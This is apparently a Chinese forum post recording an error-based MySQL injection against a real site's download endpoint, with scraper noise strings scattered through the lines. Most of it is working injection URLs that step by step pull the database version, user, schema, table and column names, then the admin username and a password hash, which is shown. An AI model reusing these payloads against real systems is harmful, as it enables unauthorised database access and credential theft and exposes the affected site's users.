php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
1 W  }' F: D& M
之前想找个测试 没想到这有 可以测试下做个记录而已

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
7 P& I" J: V* c
/data0/htdocs/leqi_new/app/myapp.php

% S" L2 r& K. ]9 C- O$ f* J 或者
7 c/ ~/ n; W5 e  m, d! o8 U
/**********version()**********/ 5.1.49-log
/ P$ u. Z8 o8 Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
' }8 {+ C0 L  b3 S+ J! A6 ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 ?. D) N, b6 q
9 J* b+ Q+ z5 B- {( H* |/**********database()**********/  leqi
% x: W, @0 r0 k3 O7 K; }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

: O- v' c, s9 h" t/**********limit依次递归爆库**********/
* A* ?/ b2 V( I$ v7 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 T/ d1 T; @  f: |6 W1 q% u& Uinformation_schema
# \% j( L1 J% A$ V# x8 h: Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* d" Y9 j% q, o5 F$ a- }' f/ zleqi
: E+ |% E) |2 m$ E, phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ _. N+ g/ \9 {4 S2 Gtest
; r) b! i8 g( ^# ]7 f
2 R: `# f/ t% {5 ]3 n/**********limit依次递归爆表名**********/
- U, W6 }% b" p5 A6 lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********limit依次递归爆字段名**********/
2 m# D6 [4 |9 u$ [3 Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" K0 P2 L+ V( H4 E! Wuser_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
9 ^, t0 C6 E- g. thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- Q0 g+ p& n+ ~- u3 _! G* p! ~0 H0 \/wapc/5000_0005_003
& p$ ~* V/ [. s' y& k& `' U3 t11 341 351 361
/**********爆数据**********/
$ j: y7 i6 x' G) h% B( x5 Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
7 d* s- c" w0 i# l5 k5 W# [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd


- ?2 a# [( m! i- A! w